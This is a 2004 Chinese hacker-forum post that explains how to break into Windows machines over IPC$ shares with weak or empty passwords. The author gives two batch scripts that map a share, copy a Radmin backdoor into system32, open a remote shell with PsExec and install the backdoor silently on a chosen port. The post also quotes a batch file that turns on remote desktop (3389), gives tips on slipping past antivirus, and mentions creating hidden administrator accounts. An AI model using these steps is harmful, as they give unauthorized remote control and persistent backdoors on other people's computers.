论坛: 黑客进阶 标题: 关于“红衣刺客”开3389的批处理文件and我的IPC$入侵经验。 复制本贴地址    
作者: thirdworld [thirdworld]    论坛用户   登录
他的这个东西在http://www.chinesehack.org/down/show.asp?id=3745

下载他的这“产品”之后,得到:
open3389.bat 开3389终端的批处理程序
3389.bat 辅助批处理
psexec.exe NT的远程执行工具

其中辅助批处理中内容如下:
@echo [Components] > c:\sql
@echo TSEnable = on >> c:\sql
@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
@del C:\server

我就搞不懂,最后的@del c:server放在那里有个什么用?还不如改成@del %0
另外,这个批处理中的"sql"这个值是指什么?我们下次远程登录用的帐号么?
另外,@sysocmgr /i:c:\winnt\...这一段中的c:\winnt\...
是否可以改成%systemroot%\winnt\...

*******************************************
研究IPC$入侵三天了。谈谈我的经验撒。(这里是“精简版方案”.我还有一系列方案撒,需要的同志向我索要。QQ408323461)

需要准备的东东。
扫描工具:当然是推荐本站的20cnIPC扫描工具喽。真是又小又好用。
后门程序:我这里使用的是radmin2.1版本的。
辅助程序:PsExec(这个东西实在太好了。可以执行目标机的程序...)
编写两个批处理文件先:
第一个:
@echo off
@echo 正在连接"%1"... ... ... ...
@net use \\%1\ipc$ %3 /user:"%2"
@echo 复制后门程序到\\%1 ... ...
@copy r_server.exe \\%1\admin$\system32
@echo 正在远程启动目标机的CMD程序... ... ...
@PsExec \\%1 -u "%2" -p %3 cmd.exe
第二个:
@echo off
@echo 正在连接"%1"... ... ... ...
@net use \\%1\ipc$ %3 /user:"%2"
@echo 复制后门程序到\\%1 ... ...
@copy AdmDll.dll \\%1\admin$\system32
@copy raddrv.dll \\%1\admin$\system32
@copy RAdmin.reg \\%1\admin$\system32
@exit

先扫到一台目标机。假设IP为220.160.20.30 帐号为administrator 密码为123456
那么打开DOS。输入1 220.160.20.30 administrator 123456 回车
OK,如果没有意外的话,你已经复制一个主后门程序到目标机,并且进入了对方的DOS。
接着,你输入dir r_server.exe 查看一下有没有这个文件!如果没有,那么你得另想方法入侵了,因为对方的杀毒软件能够查出你的后门程序。(我已经有对策了,但是这里讲的是“精简版”的,所以不想多说。)
当然,通常这个程序是不会被查杀的,至于原因么,呵呵,你自己去找一些关于radmin的使用说明吧。毕竟现在把它列在查杀名单的杀毒软件厂商还不多。
OK,如果前面执行顺利的话,你可以进行第二步啦。
开启另外一个CMD窗口。(注意,先前开的那个CMD窗口显示的已经是目标机中的。)
输入2 220.160.20.30 administrator 123456 回车
这一步是把另外三个后门辅程序复制上去。
这时这个刚打开的CMD窗口会消息,只留着刚才那个。我们再输入
regedit /s radmin.reg 回车
r_server /install /silence 回车
没有意外的话,你可以打开你的RADMIN的控制台了.
万一连接不上怎么办呢?
当然是配置一下后门喽。
r_server /port:13140 /pass:13147520 /save 回车
r_server /install /silence 回车
看得懂上面的意思么?呵呵~不懂自己提问撒~~~
然后接下去的你自己看着办喽。
因为临时有点事,所以不再这里细说了。
我研究了三天,说实在的,确实整理出了一套对付IPC$并且是弱口令或空口令目标机的方法。
比如,我可以在复制后门之前先关闭对方可能存在的杀毒软件或防火wall进程,确保后门程序不会“薄命”。可以查看对方操作系统的详细信息。自动建立一个隐藏的超级帐户,查看对方开启的所有服务端口,查看目标机所有进程并关闭进程,可以...可以的功能太多了。实在得走了。呵呵。
总之改天我再来细说撒。

对了。上面的那个关于开3389批处理的问题如果有谁知道请帮我解答。如果解决了这个问题,我的方案就又多了一个功能了。呵呵。。。。。。

[此贴被 夜空游离(thirdworld) 在 09月14日21时27分 编辑过]

地主 发表时间: 04-09-14 21:05

回复: hackerjune [hackerjune]   论坛用户   登录
你的经验,不错`
但还是又点疑问```

B1层 发表时间: 04-09-18 17:04

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号